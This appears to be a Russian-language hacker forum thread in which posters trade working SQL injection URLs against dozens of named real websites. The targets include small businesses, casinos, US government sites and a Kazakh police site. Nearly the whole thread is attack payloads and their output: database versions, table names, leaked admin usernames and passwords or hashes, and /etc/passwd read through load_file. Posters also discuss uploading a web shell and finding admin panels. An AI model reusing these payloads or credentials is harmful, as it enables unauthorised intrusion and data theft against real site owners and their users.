http://www.belanovsky.ru/links/ind.php?id_typ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,customerID,Login,cust_password,Email,first_name,last_name,subscribed4news,custgroupID,addressID,reg_datetime,ActivationCode,CID),8,9,10,11,12,13,14,15+from+SS_customers/* USER: [email protected]: VERSION: 5.0.45-log: DATABASE: u55631 1:admin:d2luZG93c21vYmlsZQ==:[email protected]:::1:0:0:2007-03-01 16:26:01::3
2 ThreeD Сомневаюсь, что это �B��� можно использовать в качестве логина Вот столбцы из таблицы admin: UID DEPARTMENT DEPARTMENT_UID ID PWD NAME SEX MOBILE EMAIL PRIVILEGE LAST_LOGIN LAST_CHPWD Я админку не искал,но думаю для авторизации используют не имя на японском
Чтоб в тему: http://www.attcottonbowl.com/news_room/releases.php?uid=-160'+union+select+1,2,3,4,5,concat_ws(0x3A3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16+from+user/* 4.1.20::cottonbowl::cottonbowl@localhost В таблице user поля подобрать не смог (
Code: http://mirfurniture.ru/ind.php?id_typ=0x3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 5.0.33-log/dmebel6/root@localhost Code: http://www.9528033.ru/board/ind.php?id_typ=0x2d3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 4.1.22/www9528033ru/f9528033@localhost Code: http://neodoska.ru/ind.php?id_categ=0x2d3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20/* 5.0.45-community/angelos_doska/angelos@localhost Готовые их там еще тысячи в ГУГЛЕ =) Code: http://www.ridgecrestdevelopments.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.regencycollege.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.rogerssprayers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.lifelinebrokers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.shaughnessyappliance.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.dembytrailer.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.neufeldbuildingmovers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.kwpetro.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.hubcity150.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.greatwestwarehouse.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.saskatoonbeds.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.numacorptest12.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.efficiencyheating.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.numacorptest11.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.imatroncontinental.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.minitune.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.ceresindustries.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.saskatoonbeds.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.numacorptest3.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.sewandhome.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.numacorptest4.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.lifelinebrokers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.wildrosegarments.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.efficiencyheating.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.dembytrailer.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.virgorenovation.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.olympicpavingstone.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.firsteditionfirstaid.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.ironmax.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.numacorptest18.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.numacorptest19.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.numacorptest16.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.numacorptest.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.peak-mechanical.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.taylorgroupofcompanies.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.goldentouchcarpet.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.numacorptest13.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.firsteditionfirstaid.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.dixondevelopment.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.olympicpavingstone.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.numacorptest.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.saskatoonprosign.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.goldentouchcarpet.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.highwayagencies.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* http://www.chinese.regencycollege.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/* БОЯН, блин че вам лень посмореть в АНТИБОЯН ???!!!!
Вот решил сегодня пройтись по besthosting.in.ua Ну вот результат Тут все что угодно и магазины и инфо службы http://zapodarkami.kiev.ua/pages.php?page=-9+union+select+1,2,3,concat_ws(char(58),TABLE_NAME,COLUMN_NAME)+from+INFORMATION_SCHEMA.COLUMNS+limit+190/* http://www.goldshop.kiev.ua/kat.php?kat=-8+union+select+1,user()/*-- http://avenue.rielt.org/real-estates.php?m=-3+union+select+1,2,3,4,5,6,7,8,user(),10/* http://ceramica.com.ua/cat2.php?ven=-14++union+select+1,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),3+from+INFORMATION_SCHEMA.COLUMNS+limit+600/* http://style9999.kiev.ua/all.php?tov_id=-2953+union+select+1,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME,0x3a),3,4,5,6,7,8,9,10,11,12+from+INFORMATION_SCHEMA.COLUMNS+limit+1+offset+210/* http://www.betta.ua/?pageid=-274+union+select+concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME)+from+INFORMATION_SCHEMA.COLUMNS+limit+1+offset+210/* http://ukr-links.kiev.ua/section.php?kat=3&subkat=-28%20union%20select%201,2,3,4,5,concat_ws(char(58),id,kat%20,subkat,url,name,info,keywords,status,date,date2,iphost,view,user,email,nashbutton,ocenka,tmp2%20),7,8,9,10,11,12,13,14,15,16,17%20from%20ukrlinks_baze.site%20limit%209999/*&page=264 http://www.udrua.com/cat2.php?id=-723+union+select+concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+INFORMATION_SCHEMA.COLUMNS+limit+1+offset+310/* http://www.uakiev.info/section.php?kat=9&subkat=-83+union+select+1,2,3,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),5,6,7,8,9,10,11,12+from+INFORMATION_SCHEMA.COLUMNS+limit+1900/* http://www.webinfo.kiev.ua/kat.php?kat=-6+union+select+1,2,3,4,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.COLUMNS+limit+175,1900/* http://www.webkatalog.kiev.ua/section.php?kat=9&subkat=-79%20union%20select%201,2,3,4,5,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),7,8,9,10,11,12,13,14,15,16,17%20from%20INFORMATION_SCHEMA.COLUMNS%20limit%20175,190000/*&page=4 кто захочет сам посмотрит
Code: http://www.worldstart.com/tips/tips.php/1862/**/and/**/ascii(lower(substring(version(),1,1)))=0x33/* Тройка (( жесть
Кому govHA?) Кому govHA?) http://www.dot.ca.gov Code: [B]http://www.dot.ca.gov/dist07/travel/projects/?pib=det&id=0x2d3127%20union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*[/B] 4.0.18-standard-log/d7mediapr/[email protected]
Опять я вам принес govHA =) http://prairieviewtexas.gov Code: [B]http://prairieviewtexas.gov/Page.php?id=-1'%20union+select+1,2,3,4,5,6,7/*[/B] 5.0.45-community-nt/cpv/cpv@localhost http://kostanaypolice.kz/ ну а это уже совсем) МВД Республики Казахстан Code: [B][COLOR=Red]http://kostanaypolice.kz/index.php?id=0x2d3127)%20union+select+1,2,concat_ws(0x2F,version(),database(),user())/*[/COLOR][/B] 4.1.22-log/t314kz_dvd/t314kz_dvduser@localhost Все за мной приехали Не забывайте меня
http://www.fdh.com/news/show.php?id=-52+union+select+1,concat_ws(char(58),user,password),3,4,5+from+mysql.user+limit+0,10/* fdhllp:4ee995d07a241a7b http://www.falltvpreview.com/show.php?id=-134+union+select+1,2,3,4,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+INFORMATION_SCHEMA.COLUMNS+limit+1-- И такой вопрос какой запрос прописать чтобы создать дамп БД на falltvpreview.com ну и в первом случае тоже http://www.airsoftgun.ee/rus/show.php?object=news&mode=full&id=-120+union+select+1,user(),3,Version(),5,6,7+from+INFORMATION_SCHEMA.COLUMNS+limit+1/* [email protected] 5.0.32-Debian_7etch1-log
howtostudy.org 4.1.20:tribble@localhost:howtostudy rabota.md 5.0.45:coruptie@localhost:coruptie_rabota videology.ru 5.0.22:videologyr_777@localhost:videologyr_777 alex:f1c1592588411002af340cbaedd6fc33:7 pass:777 mailto:[email protected] nickdemidov:381987d375be5b533fc11198005ab02d:0 eurekaeurope.com 4.0.27:[email protected]:nigor dumpfile
zhuk.net Code: http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=@@version-- version Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) db_name() rcb system_user rcb Code: http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- по началу в ручную доставал таблицы из information_schema.tables, но потом их количество стало напрягать..и я воспользовался дампером от Elekt'а Code: RegSubTR mt_Referrers mt_RobotLog mt_Sessions Questlines AEventOpl AEventSost Aissue AissueER AissueNI AissueTR AissueYK Anketa AnketaAdv AnketaBelarus AnketaEmailSubscr AnketaEmailSubscrTest AnketaEvents AnketaEventsPost AnketaEventsProfiles AnketaFinUsl AnketaForum2002 AnketaIvr AnketaKipr AnketaKonkurs AnketaMan AnketaMoscow AnketaPlans AnketaPlans2 AnketaPlans20021 AnketaQuestions AnketaReg AnketaRfi AnketaRostov AnketaSamara StatAccessLog Messages StatAccessIP ArtCommCookie Artcomments mt_Users Autorslist Companieslist tblZsearch GuestbookNI rcbforum PartsNI JournalName SubscriptionPeriod Person Users PartsTR PartsYK tblCategory StatAccessSiteOld tblForum tblTopic StatAccessSite ConfaName tblThread Autors PartsER tblAuthor Companies GuestbookYK Parts GuestbookER tblPMMessage UKSpeek Newsline tblBuddyList AnketaSi2 NewsSprings tblConfiguration tblDateTimeFormat tblGroup UsersRCBComp tblPoll Articles tblPollChoice AnketaSamara2 tblPollVote tblEmailNotify AnketaSi tblPermissions AnketaSouth AnketaSwiss AnketaTel AnketaThailand tblSession AnketaTR AnketaYK tblGuestName Banners RegSubscription tblSmut Archiveinf Employes tblBanList Guestbook UsersRole Koter1 Koter2 Koter3 MailBoxes Numb Partadengnew syssegments Partadnew sysconstraints Post mt_Config PostService mt_Definitions PostServiceTheme mt_IPCountry PostTemp mt_Keywords QuestCookie mt_Names mt_PageLog RegSubYK Regions mt_PageNames Questionary RegSub mt_ReferrerNames Интересна таблица Users Code: http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=(SELECT+TOP+1+cast(idus+as+nvarchar)%2B%27%3A%27%2Bcast(UID+as+nvarchar)%2B%27%3A%27%2Bcast(PW+as+nvarchar)+FROM+USERS+WHERE+idus=1)-- Code: 1:admin:p3OK_+ 2:sub:2WEdd& Code: http://www.zhuk.net/adminka.php Должно быть админка, но от неё нет толку, ибо 403 sdigital.ru Code: http://www.sdigital.ru/view_product.asp?idProduct=3196&idCategory=14&idSubCategory=81+or+1=@@version-- version Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) db_name() u93901 system_user u93901 имеются таблицы Code: News Meta Pages Products SubCategories UsualCarts SupProducts Clients Admin Categories Brands Currencies интересная таблица Admin колонки login и pass Code: http://www.sdigital.ru/view_product.asp?idProduct=3196&idCategory=14&idSubCategory=81+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(pass+as+nvarchar)+FROM+Admin)-- Там всего один пользователь, а именно Code: admin:gbpltw админка Code: sdigital.ru/admin highrollerbonuses.com Code: http://www.highrollerbonuses.com/high_roller_casino.php?casid=900+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* version() 4.0.24_Debian-10sarge3-log user() junior@localhost database() junior casinogenie.co.uk Code: http://www.casinogenie.co.uk/casino_review.php?casinoid=9999+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 version() 5.0.24a-Debian_1-log user() root@localhost database() casinogenie интересные таблицы Code: access_types admins admin_id username passwd realname email is_active campaigns clients suppliers adminlogin blog_author novinkisezona.ru Code: http://www.novinkisezona.ru/show_cat2.php?grid=-20+union+select+concat(version(),0x3a,user(),0x3a,database()) version() 4.1.20-lk-log user() novinkisez@localhost database() novinkisez nycpov.com Code: http://www.nycpov.com/vr_viewer.php?vrid=-5+union+select+1,convert(concat(version(),0x3a,user(),0x3a,database()),binary),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 version() 4.1.16-standard-log user() [email protected] database() nycpano superdyke.com Code: http://www.superdyke.com/venueprofileview.php?ghid=-38+union+select+1,2,3,4,5,6,7,concat(version(),0x3a,user(),0x3a,database()),9/* version() 4.0.27-standard-log user() super_super@localhost database() super_superdyke dekalaser.ru Code: http://dekalaser.ru/products/index.php?prid=-9+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8 version() 5.0.45-log user() [email protected] database() u19010 galant-fasad.com.ua Code: http://galant-fasad.com.ua/content.php?prID=1' version() 4.0.27-max-log user() [email protected] database() trialog3 planeta-sos.com Code: http://www.planeta-sos.com/goods.php?prid=999&rid=1+union+select+1,concat(version(),0x3a,user(),0x3a,database()) version() 4.1.21-log user() [email protected] database() planetasoscom_ssr posterdb.de Code: http://www.posterdb.de/detailmovie.php?filmID=-366+union+select+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9/* version() 5.0.22 user() web207@localhost database() usr_web207_1 интересные таблицы Code: person posteruser outgroup_members uni-cis.ru Code: http://www.uni-cis.ru/news2.php?nid=-358+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4 version() 4.0.23-standard user() unicis_user@localhost database() unicis_database
Code: http://www.electroportal.net/vis_directory.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(version(),0x3a,user(),0x3a,database()),10,11,12,13,14/* 5.0.32-enterprise-gpl-nt:electroportal@localhost:electroportal subdirectory Вообще сайт ебанутый, с названиями таблиц по 3 слова =\ какой то ит. магазинчек Code: http://www.allemandi.com/dett_libri.php?id=-183+union+select+1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/* 6.0.2-alpha-community-nt-debug о_О я пропустил выпуск новой версии .. ? Code: http://www.extenzilla.it/scheda_estensione.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/* 5.0.24a-standard-log есть таблица smf_members, дальше смотреть не стал Code: http://www.mpa-italia.it/press.php?id=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,version()/* 5.0.45 есть таблица letterit_user но почему то по запросу Code: http://www.mpa-italia.it/press.php?id=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,table_schema+from+information_schema.tables+where+table_name=0x276C657474657269745F7573657227+limit+1,1/* ниче нет, х3 че так.
Парочка студий веб дизайна. Дайте им свои деньги --------------------------------- Авторский сайт "Агарев Сергей", фрилансер походу _http://www.agarev.com/website.php?id=99999999+and+1=2+union+select+1,concat(user(),char(58),version(),char(58),database()),3,4/* factorho_agarev@localhost:5.0.45-community:factorho_dbagarev _http://www.agarev.com/website.php?id=99999999+and+1=2+union+select+1,2,concat(lgn,0x3a,pswd),4+from+agrv_user/* agrv_admin:580c1c296bdae1e2 --------------------------------------- «Витрум-Медиа» Питер _http://www.vitrum-media.ru/index.php?menu=49&iddoc=104+and+substring(version(),1,1)=4 вывода нет подзапросы
pixheaven.net sansihotels.com 5.0.22-Debian_0ubuntu6.06.6-log:sansihotels columnists.com 5.0.45-community:nsncsu2_members@localhost:nsncsu2_columnists members members_new
http://www.pconsult.dp.ua/index.php?pn=-99999+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5/* USER: pconsult_user@localhost VERSION: 4.1.21-standard-log DATABASE: pconsult_db Таблы так и не нашел Кто найдет - отпишитесь.
www.getethical.com Code: http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,version(),3,4,5/* Доступ к mysql.user Code: http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,concat_ws(0x3a,user,password,host),3,4,5+from+mysql.user/* - Рут без пароля, однако подключение только с локалхоста. Хотя существует юзер: leith:663ebe8f58ee1b6c:% - откуда угодно - но учитывая желание залить шелл - не интересно file_priv=Y Code: http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,file_priv,3,4,5+from+mysql.user+where+user=left(user(),locate(0x40,user())-1)/* /etc/passwd Code: http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,load_file('/etc/passwd'),3,4,5/* И кавычки не экранируются=) кажется можно попробовать залить шелл. httpd.conf Code: http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3,4,5+from+mysql.user/* Однако папочки /var/www/getethical/public_html/ не нашлось(((( Может кто-то подкажет где можно посмотреть полный путь к сайту? Ну и напоследок - есть интересная таблица customers
Сорри, смотрел тут, не нашел, посему и запостил: http://filefront.jino-net.ru/sql.html Однако у него без file_priv'a исправляюсь: Code: http://adena.ru/keys.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,table_name,22+from+information_schema.tables+limit+0,1/*
